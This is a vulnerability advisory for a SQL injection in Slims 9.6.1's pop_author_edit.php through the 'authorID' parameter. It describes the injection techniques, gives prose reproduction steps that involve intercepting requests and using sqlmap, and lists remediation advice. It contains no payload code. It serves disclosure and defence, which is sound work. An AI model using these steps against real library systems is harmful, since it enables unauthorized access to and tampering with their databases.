Slims SQL Injection Vulnerability in pop_author_edit.php

A SQL injection vulnerability has been identified in Slims (Senayan Library Management Systems) version 9 Bulian 9.6.1. The issue resides in the admin/modules/bibliography/pop_author_edit.php file, where user inputs 'biblio_id' and 'authorID' are directly included in a SQL query without proper sanitization. This flaw allows attackers to manipulate the 'authorID' parameter to inject malicious SQL code, potentially leading to unauthorized data access or compromise of the entire database.

Impact

Exploitation of this vulnerability allows for SQL injection, where an attacker can manipulate database queries. This could lead to unauthorized data access, data modification, or in some cases, executing administrative operations on the database. The vulnerability was confirmed to be exploitable through Boolean-based blind, time-based blind, and UNION query injection techniques.

Reproduction

To reproduce this vulnerability, intercept a request to 'admin/modules/bibliography/pop_author_edit.php' and modify the 'authorID' parameter to include malicious SQL payloads. After sending the request, the application's response can be monitored for signs of successful injection, such as SQL errors or unexpected data. Additionally, tools like 'sqlmap' can be used to automate the exploitation process and verify the vulnerability.

Remediation

Users are advised to update to the latest version of Slims and ensure that user inputs are properly validated and sanitized. Implementing parameterized queries or prepared statements can also help mitigate the risk of SQL injection vulnerabilities.